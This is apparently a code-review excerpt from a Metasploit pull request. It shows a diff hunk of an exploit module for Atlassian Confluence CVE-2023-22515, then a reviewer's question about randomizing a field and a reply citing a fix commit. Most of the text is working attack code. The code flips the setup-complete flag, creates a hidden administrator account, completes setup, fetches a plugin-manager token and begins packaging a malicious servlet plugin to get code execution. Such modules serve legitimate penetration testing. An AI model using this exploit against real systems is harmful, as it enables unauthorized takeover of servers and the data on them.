modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+      'vars_post' => {
+        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")
+    end
+
+    print_status('Creating a new administrator user account...')
+
+    # usernames must be lowercase
+    admin_username = rand_text_alpha_lower(8)
+    admin_password = rand_text_alphanumeric(8)
+
+    # 2. Create a new administrator user account.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      },
+      'vars_post' => {
+        'username' => admin_username,
+        'fullName' => rand_text_alphanumeric(8),
+        'email' => "#{rand_text_alphanumeric(8)}@localhost",
+        'password' => admin_password,
+        'confirm' => admin_password,
+        'setup-next-button' => 'Next'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action')
+    end
+
+    print_status("Created #{admin_username}:#{admin_password}")
+
+    # 3. force the setup to become compleated, to allow normal Confluence operation to continue.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')
+    end
+
+    print_status('Adding a malicious plugin...')
+
+    # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
+      'headers' => {
+        'Authorization' => basic_auth(admin_username, admin_password),
+        'Accept' => '*/*'
+      },
+      'vars_get' => {
+        'os_authType' => 'basic'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/')
+    end
+
+    upm_token = res.headers['upm-token']
+    unless upm_token
+      fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/')
+    end
+
+    begin
+      payload_endpoint = rand_text_alphanumeric(8)
+
+      plugin_key = rand_text_alpha(8)
+
+      # 5. Construct a malicious Servlet plugin JAR file.
+      jar = payload.encoded_jar
+
+      jar.add_file(
+        'atlassian-plugin.xml',
+        %(
+<atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2">
+  <plugin-info>
+    <description>#{rand_text_alphanumeric(8)}</description>
+    <version>1.0</version>
```

Comment:
Can't this field be randomized?

Reply:
resolved via [0fc35bf](https://github.com/rapid7/metasploit-framework/pull/18461/commits/0fc35bf6d38077b9a8c96b4b65bbfa67ef288d09)